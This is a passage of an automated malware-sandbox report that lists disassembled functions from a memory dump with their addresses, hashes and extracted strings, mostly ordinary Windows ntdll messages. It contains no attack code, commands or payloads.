                                                                            • Opcode ID: 4e371b7a3a94f06c10ca84c22fd77ad1dd5cb3526a3bff275ac049af84a3e03c
                                                                            • Instruction ID: 7d484cde0a29eba9573320ba998d674c6a0b2c997a67d6b9216de4178e673aaf
                                                                            • Opcode Fuzzy Hash: 4e371b7a3a94f06c10ca84c22fd77ad1dd5cb3526a3bff275ac049af84a3e03c
                                                                            • Instruction Fuzzy Hash: 5790023160180443D105B5585908707000997D0201F55D811A442469CED65689916221
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2F60 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 5b0d5fadc57dc9ab3b8e044afbf58fc25cfa4e371c4bbe4a0db14ef9cc8d7578
                                                                            • Instruction ID: 0772055cd8aaf214c8f5249e827d6b953fdc90854fb926bb69397e8a8f4bdc96
                                                                            • Opcode Fuzzy Hash: 5b0d5fadc57dc9ab3b8e044afbf58fc25cfa4e371c4bbe4a0db14ef9cc8d7578
                                                                            • Instruction Fuzzy Hash: 2D90026161180082D109B5584804707004997E1201F55C412A6154698DC5298DA15225
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2FA0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ddaeca01cdb7778bc15c0d0c43cb62bab1873fdcf3c28aa94a58f60642788566
                                                                            • Instruction ID: c553789e56d4508f0c9b6620819911ac6aeaeef8990ed4b41e84b55fc74f55b3
                                                                            • Opcode Fuzzy Hash: ddaeca01cdb7778bc15c0d0c43cb62bab1873fdcf3c28aa94a58f60642788566
                                                                            • Instruction Fuzzy Hash: 21900231601C0442D105B5584C08747000997D0302F55C411A9164699FC665C9D16631
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2E30 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ff77a6af9cea1a92bc0a437c37d2c8d9bddb2bf89ee0c132365d73283e825419
                                                                            • Instruction ID: 61e020fe903e74065578b699bd91eb4635724102ceb84c4e5adc9720d0cf051c
                                                                            • Opcode Fuzzy Hash: ff77a6af9cea1a92bc0a437c37d2c8d9bddb2bf89ee0c132365d73283e825419
                                                                            • Instruction Fuzzy Hash: 4790022170180442D107B5584814607000DD7D1345F95C412E5424699EC6258A93A232
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2EE0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b66c2f71b0c1734321406359ea5d9d423c15aafb35d784b4517333e08aadb802
                                                                            • Instruction ID: a1fc36b9b08b3f2ad154947d476e5e8cdcad001caba918c107b25d5a8bc5028a
                                                                            • Opcode Fuzzy Hash: b66c2f71b0c1734321406359ea5d9d423c15aafb35d784b4517333e08aadb802
                                                                            • Instruction Fuzzy Hash: 9A900261601C0443D145B9584C04607000997D0302F55C411A6064699FCA298D916235
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F3010 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 343c5d6b6c37a8aa5098ebf6568cb3ca7de459d5f23d196d34f92efb7ceef6ad
                                                                            • Instruction ID: 5c48f0c70c346e622c1b718943fbf9359d0cfba5545e6a5f370e263da0a0dbec
                                                                            • Opcode Fuzzy Hash: 343c5d6b6c37a8aa5098ebf6568cb3ca7de459d5f23d196d34f92efb7ceef6ad
                                                                            • Instruction Fuzzy Hash: 4C900221601C4482D145B6584C04B0F410997E1202F95C419A8156698DC91589955721
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F3090 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b0cd9546f0819b2d0f33a9638371fde28ad0fe40c8e3f039a8ac72d3764f156c
                                                                            • Instruction ID: 341a4cdfb0002b435b9bab2cb43d650811d4555ac3a0b92c6d4a1583f95712ab
                                                                            • Opcode Fuzzy Hash: b0cd9546f0819b2d0f33a9638371fde28ad0fe40c8e3f039a8ac72d3764f156c
                                                                            • Instruction Fuzzy Hash: E290022164180842D145B5588814707000AD7D0601F55C411A4024698EC6168AA567B1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F35C0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 82de95e9640697c35620daccbb899c2eb3a6020e18d9af7528f60227933143e3
                                                                            • Instruction ID: 04740445208a0367bea1166d17e2f99cf4d28277e79a32126c243bb879c5cc75
                                                                            • Opcode Fuzzy Hash: 82de95e9640697c35620daccbb899c2eb3a6020e18d9af7528f60227933143e3
                                                                            • Instruction Fuzzy Hash: 4C900231A0590442D105B5584914707100997D0201F65C811A44246ACEC7958A9166A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F39B0 Relevance: .0, Instructions: 4COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7708565c63007bed625c50085948a1c3414ed25a820668be6060e892f3db3310
                                                                            • Instruction ID: 9bd62fef2b2842e20d4f6a65ee16d2853fc301b85c68adeb753ca44a87d95da7
                                                                            • Opcode Fuzzy Hash: 7708565c63007bed625c50085948a1c3414ed25a820668be6060e892f3db3310
                                                                            • Instruction Fuzzy Hash: A690022164585142D155B55C48046174009B7E0201F55C421A48146D8EC55589956321
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: 7de3d4e768e5b69d6d68d393a81832bea69c87ecf2353fb717d24a4947dd8f3a
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 782c59c389900392aeb8a7e2dd03b6de0dc45202d48a886c0a7e897419d07c99
                                                                            • Instruction ID: 0dc63853fb64a337f20a63be5993dcb46c1404a43569caed47fcf8b04186f24d
                                                                            • Opcode Fuzzy Hash: 782c59c389900392aeb8a7e2dd03b6de0dc45202d48a886c0a7e897419d07c99
                                                                            • Instruction Fuzzy Hash: 5551E6B5A00656AFCB11DB9C8D8097FFBB8BB48240F54816DF565DB641D374DE408BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01662410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: 9e25a3a62c70193c5a2d6c06a9b4659e4e0f6414264e8c202c210e587c1f49c3
                                                                            • Instruction ID: 515656f7fb7d249608880c41108016d635b1666fa42b63928036f811128a54ab
                                                                            • Opcode Fuzzy Hash: 9e25a3a62c70193c5a2d6c06a9b4659e4e0f6414264e8c202c210e587c1f49c3
                                                                            • Instruction Fuzzy Hash: A351F371A00646AFCB31DF9CCCA097FBBFDAB44200B44846DE4D6D7681E774DA408760
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Execute=1, xrefs: 01624713
                                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01624725
                                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01624742
                                                                            • ExecuteOptions, xrefs: 016246A0
                                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01624655
                                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016246FC
                                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 01624787
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                            • API String ID: 0-484625025
                                                                            • Opcode ID: 494a878e7194767db1bc5f52341c1b07cded1e70ba03230ab1ba6f2a3b01a6e2
                                                                            • Instruction ID: bb5e14c218e41985a7bfeeed6603285a21340a681d20b904ca2bc838c91cef44
                                                                            • Opcode Fuzzy Hash: 494a878e7194767db1bc5f52341c1b07cded1e70ba03230ab1ba6f2a3b01a6e2
                                                                            • Instruction Fuzzy Hash: 3C512C31E4021AAAEF15ABA8DC89FAE77E8FF58304F0400DDD605AF190DB709A458F91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: __aulldvrm
                                                                            • String ID: +$-$0$0
                                                                            • API String ID: 1302938615-699404926
                                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction ID: 79de276309ee4ee3267b14be682321d6c9488e69a43650a784cb0f68cdabde51
                                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                            • Instruction Fuzzy Hash: 1481C170E46249DEEF258E6CC8917FEBBB2BF85360F18461DDA51AF291C7349840CB51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 016620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$[$]:%u
                                                                            • API String ID: 48624451-2819853543
                                                                            • Opcode ID: fcc43c8c3f5a0120c3473f765451f569d50d4648e5610d16b4ab6227fcf16841
                                                                            • Instruction ID: 0b6f7fbf3ee88ae2e5e7ace5de679d26288b80357bf42ad809cc606c3e3ac604
                                                                            • Opcode Fuzzy Hash: fcc43c8c3f5a0120c3473f765451f569d50d4648e5610d16b4ab6227fcf16841
                                                                            • Instruction Fuzzy Hash: E42151BAE0011AABDB11DF69DC50AEFBBEDBF54645F44011AEA05E7240E730DA118BA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016202E7
                                                                            • RTL: Re-Waiting, xrefs: 0162031E
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016202BD
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                            • API String ID: 0-2474120054
                                                                            • Opcode ID: 4ecb7074cc44e09bb52d00f67d2e4dc7683743cb3175cf43efd694234f4fe2ed
                                                                            • Instruction ID: 234d3eeec08242cc3e63da33c1c1ba1ea52ba8100b2278546b99e750bfe29d6a
                                                                            • Opcode Fuzzy Hash: 4ecb7074cc44e09bb52d00f67d2e4dc7683743cb3175cf43efd694234f4fe2ed
                                                                            • Instruction Fuzzy Hash: DEE19C70608B429FD725CF2CC884B6ABBE0BB85314F144A5EF5A6CB2E1D774D846CB42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0162728C
                                                                            Strings
                                                                            • RTL: Re-Waiting, xrefs: 016272C1
                                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01627294
                                                                            • RTL: Resource at %p, xrefs: 016272A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-605551621
                                                                            • Opcode ID: 7a774a7f68fd5e30033a487cd5d5787e4884d6b5071b23508899ed7be2930503
                                                                            • Instruction ID: 082478e7f2f5775e4fcad25c80731291b9219b718143a3f1e733df23476f103f
                                                                            • Opcode Fuzzy Hash: 7a774a7f68fd5e30033a487cd5d5787e4884d6b5071b23508899ed7be2930503
                                                                            • Instruction Fuzzy Hash: 34412F31A01627ABCB25CE29CC41F6AB7E6FBA5711F104619F945EB280DB21E8128BD1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 01662300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 16e8b1748dcc49ae2477efc22fdf226d86c124138e68f42f225df27355b0eb6e
                                                                            • Instruction ID: 8704dbcb56d5c17cea993a10c8709ac7e4ce44577704b0728d1e27b363a25d14
                                                                            • Opcode Fuzzy Hash: 16e8b1748dcc49ae2477efc22fdf226d86c124138e68f42f225df27355b0eb6e
                                                                            • Instruction Fuzzy Hash: 5F316472A002199FDB21DE2DCC50BEFB7FCFB54650F84455EE949E7240EB30AA558BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 015B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $$@
                                                                            • API String ID: 0-1194432280
                                                                            • Opcode ID: 59316161dde27329b05bec0caccab7ffbc4f37731d891414f151715a1a97b7ee
                                                                            • Instruction ID: 69bcafe6fa7b449c731825176badc45028a63fbc7544affb5f43b2f8240ebe69
                                                                            • Opcode Fuzzy Hash: 59316161dde27329b05bec0caccab7ffbc4f37731d891414f151715a1a97b7ee
                                                                            • Instruction Fuzzy Hash: 62811BB1D0026A9BDB31CF54CC55BEEBAB4BF48714F1445DAAA19B7280D7305E84CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0163CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • @_EH4_CallFilterFunc@8.LIBCMT ref: 0163CFBD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2119541533.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_1580000_jqPZZhDmjh.jbxd
                                                                            Similarity
                                                                            • API ID: CallFilterFunc@8
                                                                            • String ID: @$@4Cw@4Cw
                                                                            • API String ID: 4062629308-3101775584
                                                                            • Opcode ID: 30d4ba55b21ad907066f99ec055f5d8b352470dfbd915276a0474db095381a89
                                                                            • Instruction ID: 57e68cd5500303230fb3a95895dfa2d2f44efc6ffb0b73860813e34a3605cd5c
                                                                            • Opcode Fuzzy Hash: 30d4ba55b21ad907066f99ec055f5d8b352470dfbd915276a0474db095381a89
                                                                            • Instruction Fuzzy Hash: 9F41577190021A9FDB219FA9CC40AAAFBB9FF95B50F44402EEA15EB354E774D801CB61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%